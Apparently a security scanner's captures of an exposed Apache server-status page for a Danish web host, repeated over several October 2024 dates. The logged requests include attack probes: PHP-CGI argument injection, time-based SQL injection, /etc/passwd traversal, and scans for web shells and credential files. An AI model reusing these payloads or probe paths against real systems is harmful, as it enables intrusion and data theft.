Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 22-Oct-2024 16:01:41 CEST Restart Time: Tuesday, 22-Oct-2024 06:05:04 CEST Parent Server Generation: 10 Server uptime: 9 hours 56 minutes 36 seconds Total accesses: 60368 - Total Traffic: 30.8 MB CPU Usage: u1.15 s.68 cu0 cs0 - .00511% CPU load 1.69 requests/sec - 901 B/second - 534 B/request 1 requests currently being processed, 30 idle workers _________W_______________.......______.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-10364660/17/1850_ 0.011300.00.001.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-10364650/10/1849_ 0.011400.00.000.67 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-10364670/10/1833_ 0.022510.00.000.79 13.70.69.4webhotel5.webhosting.dkHEAD /main HTTP/1.0 3-10364680/11/1812_ 0.02010.00.000.70 165.227.39.235webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-10364690/11/1757_ 0.02000.00.000.80 13.75.175.34webhotel5.webhosting.dkHEAD /bk HTTP/1.0 5-10364720/10/1804_ 0.047130.00.001.07 165.227.39.235webhotel5.webhosting.dkGET / HTTP/1.0 6-10364730/11/1806_ 0.021200.00.000.70 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-10364740/11/1791_ 0.02520.00.000.97 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 8-10364750/11/1791_ 0.03200.00.000.71 165.227.39.235webhotel5.webhosting.dkGET /server HTTP/1.0 9-10364810/10/1783W 0.02000.00.000.74 165.227.39.235webhotel5.webhosting.dkGET /server-status HTTP/1.0 10-10364820/10/1784_ 0.012500.00.000.63 13.70.69.4webhotel5.webhosting.dkHEAD /home HTTP/1.0 11-10364830/10/1785_ 0.021300.00.000.92 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-10364840/10/1780_ 0.021300.00.000.89 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-10364860/10/1778_ 0.021410.00.001.72 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-10364950/10/1724_ 0.011200.00.000.65 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-10364960/10/1723_ 0.0111110.00.000.85 81.19.232.105www.lillekrabbe.dkGET / HTTP/1.0 16-10365290/10/1721_ 0.01400.00.000.77 173.252.83.24webhotel5.webhosting.dkGET /malere/4922.jpg HTTP/1.0 17-10365300/10/1730_ 0.02360.00.000.74 165.227.39.235webhotel5.webhosting.dkGET / HTTP/1.0 18-10365360/10/1677_ 0.01300.00.000.66 165.227.39.235webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 19-10365490/10/1662_ 0.01110.00.000.79 165.227.39.235webhotel5.webhosting.dkGET /about HTTP/1.0 20-10365500/10/1665_ 0.01100.00.000.59 13.75.175.34webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 21-10365540/10/1619_ 0.02160.00.000.79 13.75.175.34webhotel5.webhosting.dkHEAD / HTTP/1.0 22-10365560/10/1618_ 0.02100.00.000.74 165.227.39.235webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-10365800/10/1489_ 0.01100.00.000.56 13.75.175.34webhotel5.webhosting.dkHEAD /wp HTTP/1.0 24-10369280/2/1465_ 0.00000.00.000.69 165.227.39.235webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 25-9-0/0/1466. 0.068700.00.000.69 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 26-9-0/0/1501. 0.038700.00.000.55 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 27-9-0/0/1414. 0.13115700.00.000.72 62.197.149.128webhotel5.webhosting.dkGET /wp-content/plugins/BrutalShell/ HTTP/1.0 28-9-0/0/1365. 0.11115800.00.000.65 62.197.149.128webhotel5.webhosting.dkGET /wp-content/plugins/aryabot/ HTTP/1.0 29-9-0/0/1324. 0.14115600.00.000.68 62.197.149.128webhotel5.webhosting.dkGET /wp-content/plugins/cache-wordpress/ HTTP/1.0 30-9-0/0/1319. 0.10115600.00.000.56 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-9-0/0/1175. 0.11115600.00.001.21 62.197.149.128webhotel5.webhosting.dkGET /wp-content/plugins/cakil/ HTTP/1.0 32-10364700/12/1185_ 0.011300.00.000.66 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-10364710/11/1129_ 0.01000.00.000.60 13.75.175.34webhotel5.webhosting.dkHEAD /backup HTTP/1.0 34-10364760/11/943_ 0.03210.00.000.46 165.227.39.235webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 35-10364770/11/887_ 0.02000.00.000.48 13.75.175.34webhotel5.webhosting.dkHEAD /bc HTTP/1.0 36-10364790/11/835_ 0.01000.00.000.73 13.75.175.34webhotel5.webhosting.dkHEAD /old HTTP/1.0 37-10364800/10/819_ 0.032500.00.000.51 13.70.69.4webhotel5.webhosting.dkHEAD /new HTTP/1.0 38-9-0/0/377. 0.08238800.00.000.23 81.19.232.105www.brandstation.infoGET /wp-json/wp/v2/users HTTP/1.0 39-9-0/0/377. 0.09238700.00.000.33 81.19.232.105www.brandstation.infoGET /wp-json/wp/v2/users HTTP/1.0 40-9-0/0/268. 0.09238700.00.000.11 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-8-0/0/218. 0.08406400.00.000.19 162.158.49.23webhotel5.webhosting.dkGET /wp-admin/js/widgets/about.php7 HTTP/1.0 42-8-0/0/168. 0.08406500.00.000.09 162.158.49.23webhotel5.webhosting.dkGET /libraries/phpmailer/updates.php HTTP/1.0 43-8-0/0/168. 0.10406400.00.000.21 162.158.49.23webhotel5.webhosting.dkGET /wp-content/repeater.php HTTP/1.0 44-8-0/0/117. 0.08406410.00.000.95 162.158.49.23webhotel5.webhosting.dkGET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.0 45-1-0/0/17. 0.032889000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde391f10f44
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 20-Oct-2024 14:22:27 CEST Restart Time: Sunday, 20-Oct-2024 06:10:04 CEST Parent Server Generation: 8 Server uptime: 8 hours 12 minutes 22 seconds Total accesses: 58254 - Total Traffic: 39.5 MB CPU Usage: u2.16 s1.18 cu0 cs0 - .0113% CPU load 1.97 requests/sec - 1402 B/second - 711 B/request 1 requests currently being processed, 34 idle workers _______W______________________.._____........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-8116000/28/1787_ 0.06000.00.010.69 64.226.78.121webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 1-8116010/27/1726_ 0.06500.00.041.56 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/midnight/ HTTP/1.0 2-8116100/25/1776_ 0.07000.00.011.18 64.226.78.121webhotel5.webhosting.dkGET /about HTTP/1.0 3-8116110/25/1771_ 0.05000.00.011.35 193.36.225.6webhotel5.webhosting.dkGET /ova-tools.php HTTP/1.0 4-8116120/25/1718_ 0.07000.00.011.54 64.226.78.121webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 5-8115800/29/1771_ 0.06030.00.011.68 64.226.78.121webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 6-8116130/25/1756_ 0.05000.00.010.81 64.226.78.121webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 7-8116220/24/1758W 0.07000.00.010.80 64.226.78.121webhotel5.webhosting.dkGET /server-status HTTP/1.0 8-8116230/24/1708_ 0.05600.00.010.84 91.239.130.203webhotel5.webhosting.dkGET /tmps/ HTTP/1.0 9-8116240/24/1755_ 0.06600.00.013.08 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/coffee/ HTTP/1.0 10-8116250/24/1750_ 0.04600.00.011.08 91.239.130.203webhotel5.webhosting.dkGET /wordpress/wp-admin/includes/wp-admin/js/ HTTP/1.0 11-8116260/24/1750_ 0.07600.00.010.91 193.36.225.6webhotel5.webhosting.dkGET /fm.php HTTP/1.0 12-8116270/24/1754_ 0.05500.00.010.74 193.36.225.6webhotel5.webhosting.dkGET /wp-content/themes/twentyfive/include.php HTTP/1.0 13-8116280/24/1699_ 0.05520.00.010.74 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/ectoplasm/ HTTP/1.0 14-8116290/24/1633_ 0.05510.00.010.68 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/light/ HTTP/1.0 15-8116320/24/1661_ 0.06500.00.031.19 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/ocean/ HTTP/1.0 16-8116330/24/1598_ 0.06510.00.041.18 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/modern/ HTTP/1.0 17-8116340/24/1539_ 0.05400.00.050.73 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/js/widgets/ HTTP/1.0 18-8116350/24/1592_ 0.05400.00.020.65 91.239.130.203webhotel5.webhosting.dkGET /wp-content/uploads/2023/ HTTP/1.0 19-8116360/24/1589_ 0.05400.00.020.80 91.239.130.203webhotel5.webhosting.dkGET /wp-content/languages/ HTTP/1.0 20-8116370/24/1569_ 0.06400.00.011.16 91.239.130.203webhotel5.webhosting.dkGET /wp-admin/css/colors/sunrise/ HTTP/1.0 21-8116380/24/1587_ 0.06400.00.010.64 91.239.130.203webhotel5.webhosting.dkGET /wp-content/uploads/2022/ HTTP/1.0 22-8116390/24/1585_ 0.06400.00.011.11 91.239.130.203webhotel5.webhosting.dkGET /wp-includes/wp-includes/ HTTP/1.0 23-8116400/24/1593_ 0.06400.00.011.11 193.36.225.6webhotel5.webhosting.dkGET /wso.php HTTP/1.0 24-8116410/24/1645_ 0.07400.00.010.69 91.239.130.203webhotel5.webhosting.dkGET /wp-includes/css/dist/ HTTP/1.0 25-8116420/24/1439_ 0.07400.00.011.18 91.239.130.203webhotel5.webhosting.dkGET /wp-includes/ID3/ HTTP/1.0 26-8116430/24/1490_ 0.06300.00.010.72 193.36.225.6webhotel5.webhosting.dkGET /wp-content/plugins/ubh/up.php HTTP/1.0 27-8116440/24/1537_ 0.06200.00.012.20 193.36.225.6webhotel5.webhosting.dkGET /text.php HTTP/1.0 28-8116450/24/1539_ 0.05400.00.010.76 40.77.167.243webhotel5.webhosting.dkGET /sitemap.xml HTTP/1.0 29-8116460/24/1520_ 0.05110.00.030.89 193.36.225.6webhotel5.webhosting.dkGET /install.php HTTP/1.0 30-8-0/0/1280. 0.113900.00.000.59 193.36.225.6webhotel5.webhosting.dkGET /about/function.php HTTP/1.0 31-8-0/0/1177. 0.122700.00.000.85 91.239.130.203webhotel5.webhosting.dkGET /wp-content/upload.php HTTP/1.0 32-8112700/35/1033_ 0.06000.00.010.86 64.226.78.121webhotel5.webhosting.dkGET /server HTTP/1.0 33-8116470/24/940_ 0.04200.00.060.99 193.36.225.6webhotel5.webhosting.dkGET /content.php HTTP/1.0 34-8119980/23/883_ 0.05160.00.010.50 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 35-8120000/23/774_ 0.06080.00.011.38 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 36-8120010/23/672_ 0.04000.00.010.86 64.226.78.121webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 37-7-0/0/300. 0.10172500.00.000.18 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-3-0/0/250. 0.091766130.00.000.07 212.5.158.153webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 39-3-0/0/200. 0.101765900.00.000.08 145.239.10.137webhotel5.webhosting.dkGET /yanz.php HTTP/1.0 40-3-0/0/200. 0.091765060.00.000.06 136.143.177.50webhotel5.webhosting.dkGET / HTTP/1.0 41-3-0/0/150. 0.101764310.00.000.04 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 42-3-0/0/150. 0.101763870.00.000.15 205.210.31.58webhotel5.webhosting.dkGET / HTTP/1.0 43-3-0/0/150. 0.101762760.00.000.10 205.210.31.59webhotel5.webhosting.dkGET / HTTP/1.0 44-3-0/0/150. 0.101762510.00.000.04 81.19.232.105www.discteknik.dkGET /robots.txt HTTP/1.0 45-3-0/0/150. 0.101762560.00.000.04 188.166.62.232webhotel5.webhosting.dkGET / HTTP/1.0 46-1-0/0/100. 0.122339200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/file.php HTTP/1.0 47-1-0/0/100. 0.132339200.00.000.03 185.153.151.145webhotel5.webhosting.dkGET /.well-known/pki-validation/scripts.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde315ffe858
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 18-Oct-2024 17:02:07 CEST Restart Time: Friday, 18-Oct-2024 16:10:06 CEST Parent Server Generation: 1 Server uptime: 52 minutes 1 second Total accesses: 4295 - Total Traffic: 1.6 MB CPU Usage: u.63 s.22 cu0 cs0 - .0272% CPU load 1.38 requests/sec - 531 B/second - 386 B/request 1 requests currently being processed, 30 idle workers ___________W___________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-17250/6/131_ 0.01700.00.000.05 89.69.118.88webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-17600/5/111_ 0.00200.00.000.04 157.55.39.202webhotel5.webhosting.dkET /database/languages/da/persons/Person_50423622.html HTTP/1.0 2-17220/6/131_ 0.016180.00.000.04 81.19.232.105www.sydsjaellandsgarderforeningGET /robots.txt HTTP/1.0 3-17290/6/131_ 0.01050.00.000.04 209.38.208.202webhotel5.webhosting.dkGET / HTTP/1.0 4-17810/5/129_ 0.01000.00.000.04 209.38.208.202webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 5-17370/5/128_ 0.001300.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-17230/6/131_ 0.01190.00.000.04 209.38.208.202webhotel5.webhosting.dkGET / HTTP/1.0 7-18080/5/127_ 0.01000.00.000.05 209.38.208.202webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-17240/6/131_ 0.00010.00.000.04 209.38.208.202webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 9-18180/5/128_ 0.01000.00.000.05 209.38.208.202webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-17320/5/130_ 0.001300.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-18310/4/125W 0.01000.00.000.04 209.38.208.202webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-18570/4/118_ 0.011560.00.000.06 62.198.143.116webhotel5.webhosting.dkGET / HTTP/1.0 13-17380/5/129_ 0.011200.00.000.11 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-18840/4/107_ 0.001400.00.000.04 62.198.143.116webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 15-17300/6/127_ 0.00010.00.000.04 209.38.208.202webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 16-17310/5/129_ 0.001300.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-17260/6/130_ 0.00640.00.000.04 3.248.187.137www.sydsjaellandsgarderforeningGET /robots.txt HTTP/1.0 18-19060/4/104_ 0.001410.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-17270/6/130_ 0.01000.00.000.05 209.38.208.202webhotel5.webhosting.dkGET /about HTTP/1.0 20-17190/6/103_ 0.00000.00.000.03 209.38.208.202webhotel5.webhosting.dkGET /server HTTP/1.0 21-19370/4/104_ 0.011300.00.000.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-17200/12/108_ 0.01010.00.000.03 3.248.187.137www.sydsjaellandsgarderforeningGET / HTTP/1.0 23-17330/5/128_ 0.011200.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-17340/5/128_ 0.011170.00.000.04 147.185.132.207webhotel5.webhosting.dkGET / HTTP/1.0 25-19680/4/104_ 0.001300.00.000.03 89.69.118.88webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 26-124710/1/101_ 0.001310.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-17210/6/103_ 0.01900.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-17390/5/130_ 0.001200.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-17280/6/80_ 0.02500.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-17360/5/80_ 0.001300.00.000.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-0-0/0/74. 0.0511900.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-0-0/0/124. 0.0811900.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 33-0-0/0/74. 0.0511900.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-0-0/0/124. 0.0411900.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-0-0/0/73. 0.0711900.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-0-0/0/50. 0.1159510.00.000.02 34.136.31.239webhotel5.webhosting.dkGET /console HTTP/1.0 37-0-0/0/50. 0.1359400.00.000.02 13.75.172.41webhotel5.webhosting.dkHEAD /bc HTTP/1.0 38-0-0/0/50. 0.14601100.00.000.02 85.203.47.8webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3f41ac17e
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 17-Oct-2024 00:31:08 CEST Restart Time: Wednesday, 16-Oct-2024 16:05:05 CEST Parent Server Generation: 8 Server uptime: 8 hours 26 minutes 2 seconds Total accesses: 82686 - Total Traffic: 46.1 MB CPU Usage: u2.11 s1.24 cu0 cs0 - .011% CPU load 2.72 requests/sec - 1593 B/second - 585 B/request 1 requests currently being processed, 29 idle workers ___W____.______________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-810960/13/2235_ 0.024500.00.000.99 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-812130/12/2230_ 0.032300.00.001.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-812830/10/2229_ 0.041510.00.001.97 40.77.167.73webhotel5.webhosting.dkGET /engelsk/info_infoId_1310372.html HTTP/1.0 3-812850/8/2279W 0.02000.00.000.90 139.59.136.184webhotel5.webhosting.dkGET /server-status HTTP/1.0 4-813450/8/2243_ 0.014800.00.002.11 34.16.83.37webhotel5.webhosting.dkPOST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.0 5-8654950/41/2151_ 0.09900.00.011.16 138.246.253.24webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 6-813460/8/2267_ 0.024800.00.000.94 34.16.83.37webhotel5.webhosting.dkGET /2nXRjCxr7B45aMpdwbizQBduzUr.jsp HTTP/1.0 7-813430/8/2261_ 0.034900.00.001.09 34.16.83.37webhotel5.webhosting.dkGET /ncupload/n2d19a.jsp HTTP/1.0 8-8-0/0/2233. 0.1110400.00.001.70 34.16.83.37webhotel5.webhosting.dkPOST /login.php HTTP/1.0 9-813260/9/2150_ 0.03000.00.000.85 139.59.136.184webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-86780/27/2135_ 0.05000.00.010.92 139.59.136.184webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-86790/27/2120_ 0.05000.00.010.98 139.59.136.184webhotel5.webhosting.dkGET /about HTTP/1.0 12-813670/7/2130_ 0.005000.00.001.19 34.16.83.37webhotel5.webhosting.dkhow_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.0 13-8654960/42/2053_ 0.094900.00.011.10 34.16.83.37webhotel5.webhosting.dkPOST /ztp/cgi-bin/handler HTTP/1.0 14-8654970/41/2036_ 0.07000.00.363.76 139.59.136.184webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 15-8654980/41/2008_ 0.093510.00.010.91 157.55.39.201webhotel5.webhosting.dkter-damer/1576-opskrift---------------------nr-312963/ HTTP/1.0 16-8655050/41/2126_ 0.085110.00.010.95 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 17-85760/36/2009_ 0.073400.00.010.85 70.164.30.202webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-86590/28/1972_ 0.064220.00.010.76 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 19-86800/24/2010_ 0.054900.00.010.89 34.16.83.37webhotel5.webhosting.dkeditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.0 20-86810/25/2005_ 0.044800.00.011.42 34.16.83.37webhotel5.webhosting.dkGET /uapim/static/pages/75/head.jsp HTTP/1.0 21-86820/25/2035_ 0.063700.00.011.34 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-86830/25/1969_ 0.054400.00.010.97 157.55.39.201webhotel5.webhosting.dkfter-damer/5097-model-2465-tammy-design-laerke-bagger/ HTTP/1.0 23-86840/24/1989_ 0.05700.00.010.84 70.164.30.202webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-86850/24/2029_ 0.0511260.00.010.76 50.118.248.6webhotel5.webhosting.dkHEAD / HTTP/1.0 25-86860/24/1869_ 0.05170.00.010.81 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 26-86870/23/1870_ 0.04070.00.011.14 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 27-86880/25/1863_ 0.05000.00.011.68 139.59.136.184webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 28-86890/24/1839_ 0.050810.00.010.86 172.121.223.240webhotel5.webhosting.dkHEAD / HTTP/1.0 29-86900/24/1838_ 0.04000.00.010.87 139.59.136.184webhotel5.webhosting.dkGET /server HTTP/1.0 30-86910/24/1770_ 0.06000.00.010.83 139.59.136.184webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-8-0/0/1748. 0.0928350.00.000.77 34.16.83.37webhotel5.webhosting.dkPOST / HTTP/1.0 32-8-0/0/1730. 0.0922000.00.000.73 52.169.11.75webhotel5.webhosting.dkGET /options.php HTTP/1.0 33-8-0/0/1685. 0.1021900.00.000.68 52.169.11.75webhotel5.webhosting.dkGET /wp-admin/user/cloud.php HTTP/1.0 34-8-0/0/1380. 0.1021900.00.000.48 52.169.11.75webhotel5.webhosting.dkGET /wp-includes/Text/wp-login.php HTTP/1.0 35-8-0/0/1273. 0.1022010.00.000.49 52.169.11.75webhotel5.webhosting.dkGET /abe.php HTTP/1.0 36-8-0/0/1201. 0.0821900.00.000.40 52.169.11.75webhotel5.webhosting.dkGET /wp-includes/theme-compat/embed-core.php HTTP/1.0 37-8-0/0/1102. 0.0921900.00.000.36 52.169.11.75webhotel5.webhosting.dkGET /wp-includes/assets/index.php HTTP/1.0 38-8-0/0/1001. 0.1021900.00.000.34 52.169.11.75webhotel5.webhosting.dkGET /cc.php HTTP/1.0 39-8-0/0/901. 0.0921900.00.000.32 52.169.11.75webhotel5.webhosting.dkGET /wp-admin/wp-admin.php HTTP/1.0 40-8-0/0/900. 0.1121900.00.000.29 52.169.11.75webhotel5.webhosting.dkGET /wp-mail.php/wp-includes/ID3/getid3s.php HTTP/1.0 41-8-0/0/801. 0.1021900.00.000.41 52.169.11.75webhotel5.webhosting.dkGET /wp-content/batm.php HTTP/1.0 42-8-0/0/700. 0.0721900.00.000.79 52.169.11.75webhotel5.webhosting.dkGET /wp-includes/Text/Diff/Engine/wp-login.php HTTP/1.0 43-8-0/0/702. 0.1021900.00.000.35 34.16.83.37webhotel5.webhosting.dkGET /_nuxt/@fs/etc/passwd HTTP/1.0 44-8-0/0/701. 0.0821900.00.000.25 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 45-7-0/0/500. 0.04185500.00.001.34 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-7-0/0/264. 0.02185500.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-7-0/0/214. 0.03185500.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-7-0/0/212. 0.03185500.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 49-7-0/0/163. 0.02185500.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 50-7-0/0/164. 0.03185500.0<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39018d56c
